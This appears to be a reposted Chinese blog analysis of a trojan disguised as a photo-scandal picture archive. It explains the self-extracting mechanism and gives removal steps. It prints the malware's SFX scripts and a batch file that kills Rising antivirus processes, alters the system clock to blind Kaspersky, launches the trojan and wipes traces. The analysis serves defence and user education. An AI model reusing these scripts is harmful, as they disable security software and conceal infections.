安全实例:遭遇“艳照门”木马

 

虚拟机系统:windows xp2 

  下载软件:迅雷

  杀毒软件:瑞星2008(打了最新补丁包)

  一、中招过程

  朋友好奇,寻找艳照门图片。在百度某贴吧中看到一条信息,提供艳照下载,并且给出了链接地址“http://guilin123.*.com/yanmenzhao.rar”于是迫不及待地用迅雷下载,下载的过程中“迅雷安全中心”弹出病毒威胁警告对话框,由于是测试忽略,点击“继续下载”。(图1)

  遭遇“艳照门”木马

  为了测试,笔者的迅雷设置了“下载完成后杀毒”。下载完成后,瑞星病毒扫描后提示“发现2个病毒,清除失败!”(图2)

  遭遇“艳照门”木马

  二、病毒分析

  下载完成的这个名称为yanmenzhao,大小为1.04M文件是个压缩文件,后缀为rar。右键单击选择“解压到yanmenzhao下”,解压后为yanmenzhao.exe,其后缀为exe,这是个自动解压文件,估计攻击者一定在其中做了文章。(图3)

  遭遇“艳照门”木马

这时千万不能直接双击打开,打开后一定会运行自解压脚本就会中招。先打开WinRAR压缩软件,然后通过“文件”→“打开压缩文件”来打开yuanmenzhao.exe,果然在其下有两个文件:艳门照.rar、ymz.exe。第一个文件应该就是图片压缩包,而第二个就是木马压缩文件。同时在WinRAR的右侧窗格中发现如下代码:(图4)

  遭遇“艳照门”木马

      Path=%systemroot%
  Setup=ymz.exe
  Presetup=艳门照.rar
  Silent=1
  Overwrite=1

  解释如下:

  第一行是文件的解压路径,在系统根目录下;

  第二页是解压后自动运行ymz.exe;

  第三行是在解压之前先解压艳门照.rar,达到掩人耳目,看不到ymz.exe文件,其实它已经运行了;

  第四行是隐藏文件,达到更隐蔽;

  第五行是覆盖目录下的同名文件,以容错更可靠。

  用同样的方法在WinRAR中解压ymz.exe,发现下面5个文件:(图5)

  遭遇“艳照门”木马

      1.bat
  1.exe
  1.vbs
  knlps.exe
  knlps.sys

  同样在右边有自解压脚本代码:

      Path=%systemroot%\temp
  SavePath
  Setup=1.vbs
  Silent=1
  Overwrite=1

  原理好上面的一样,只不过是解压到系统临时目录下。

  用记事本打开1.vbs分析,代码如下:

     CreateObject("WScript.Shell").Run "cmd /c 1.bat",0

  很明显,是调用1.bat文件。

  用记事本打开1.bat文件,代码及其解释如下:

      @ECHO OFF
  knlps.exe -l >PID.txt
  FINDSTR /i "RavMon.exe" PID.TXT >>RAV.txt
  FINDSTR /i "RavMonD.exe" PID.TXT >>RAV.txt
  FINDSTR /i "CCenter.exe" PID.TXT >>RAV.txt
  FOR /F "eol=; tokens=1 delims= " %%1 in (RAV.txt) do knlps.exe -k %%1

  上述代码是获取瑞星组件的进程ID并通过knlps.exe结束瑞星的进程。

      set date=%date%
  date 1990-01-01
  date 1990-01-01

  上述代码是修改系统时间使卡巴监控失效,这句是关键破卡巴查杀的程序流,没这句被杀木马就会被杀。

      @echo off & setlocal enableextensions
  echo WScript.Sleep 1000 > %temp%.\tmp$$$.vbs
  set /a i = 15
  :Timeout
  if %i% == 0 goto Next
  setlocal
  set /a i = %i% - 1
  cscript //nologo %temp%.\tmp$$$.vbs
  goto Timeout
  goto End

  上述代码是倒计时等待15秒

  :Next

  %systemroot%\temp\1.exe 这个是你木马的名称

  for %%f in (%temp%.\tmp$$$.vbs*) do del %%f

  上述代码第二回行就木马名称的解压目录,第三行行是倒计时等待结束后运行木马并删除。

      date 2007-10-27 aaa
  date %date% aaa

  上述代码是恢复系统时间(卡巴监控)

     RD /S /Q %systemroot%\temp\

  上述代码的含义是删除临时文件清除痕迹。

  从上面的分析可以看出该自解压包木马的运行机制是,先通过脚本终结瑞星和卡巴斯基,然后运行真正的木马程序,即1.exe,最后清除痕迹。

三、运行病毒

  1、瑞星被终结

  分析完毕,然后双击yanmenzhao.exe看看中毒症状。为了分析病毒的运行状况,事先打开了瑞星的“实时监控”和“任务管理器”,以观察病毒运行状态。运行后瑞星没有任何提示,任务栏中的瑞星实时监控图标消失,看来瑞星被终结了。另外,在任务管理中出现了一个cscript.exe进程见图6,很快地闪动,鼠标无法选择结束,大概几秒钟后该进程消失,在进程管理器中有多了2个svchost.exe进程见图7。(笔者在测试前备份了进程表,以前的为5个,多了2个)(图6)(图7)

  遭遇“艳照门”木马

  遭遇“艳照门”木马

  2、可疑的网络连接

  在命令提示符下敲入命令:

     netstat -ano

  查看网络端口连接情况,果然发现了两个可疑IP地址的端口连接:(图8)

  遭遇“艳照门”木马

      TCP 192.168.131.72:1098 116.20.215.181:8008 ESTABLISHED 1916
  TCP 192.168.131.72:1099 116.20.215.181:2630 ESTABLISHED 424

  这两个连接正好是刚才创建的两个svchost.exe进程创建的。其中的IP 116.20.215.181应该是攻击者的IP或者是一个中转IP。打开www.ip138.com查询,得知是广东省佛山市电信。(图9)

  遭遇“艳照门”木马

四、清除病毒

  1、结束进程

  在结束进程的发现这两个svchost.exe进程之间互相保护,当结束了其中的一个,另一个马上会重新新建一个。因此手工结束速度太慢,通过批处理命令来清除:

  把如下代码保存为kill.bat,双击即可。

      @echo off
  taskkill /f /pid 1916
  taskkill /f /pid 424
  exit

  提示:其中的pid是随机的,一定要找到可疑的svchost.exe进程的pid,如果结束了系统启动的svchost.exe的话,系统就会关机或者重启。确定的方法,可以参考图8。

  2、删除服务

  运行services.msc打开“服务”工具,通过分析发现了一个可疑的服务项。

  服务名称为:Workstain

  显示名称:qmijiu

  描述:Wicrosoft .NET Framework TPM

  可执行文件路径:c:\WINDOWS\system32\svchost.exe -k Workstain

  启动类型:自动

  服务状态:已启动

  评析:该服务项和Workstation非常相似,并且描述极具欺骗性,攻击者非常狡猾。(图10)

  遭遇“艳照门”木马

  提示:在禁用服务的过程中发现,如果不先结束两个svchost.exe进程,发现根本无法禁用,当你选择禁用该服务,点击确定,它马上改为“自动”运行,可见这也是进程保护在作怪。因此必须把两个进程结束掉再禁止服务。最彻底的是用命令把该服务删除,命令为: 

    sc delete qmijiu

  3、文件删除

  (1)C:\WINDOWS目录下的(图11)

  遭遇“艳照门”木马

  艳门照.rar

  ymz.exe

  (1)C:\WINDOWS\system32目录下的(图12)

  遭遇“艳照门”木马

  Workstain.drv

  Sharing.dll

  总结:该木马病毒利用大众的猎奇心理,把木马和图片打包在一起,然后通过WinRAR的自解压功能使得木马得以运行。其原理比较简单,但象朋友这样的人却屡屡中招。这例“艳照门”木马病毒给我们的启示是:

      1、做好自律,不去猎奇浏览不雅的东西;

      2、在系统中要设置显示文件的后缀,这样可以通过文件后缀就可以判断文件的类型。

   3、对自解压文件要非常小心,千万不要直接打开,应该选择用winRAR软件打开,看看有没有可疑的脚本和程序。总之,在思想上和技术上都做好准备,不要成为“艳照门”木马病毒的下一个受害者。

 

 

 

 文章来源:http://security.ctocio.com.cn/tips/348/7814348.shtml

你可能感兴趣的:(windows,软件测试,脚本,百度,大众软件)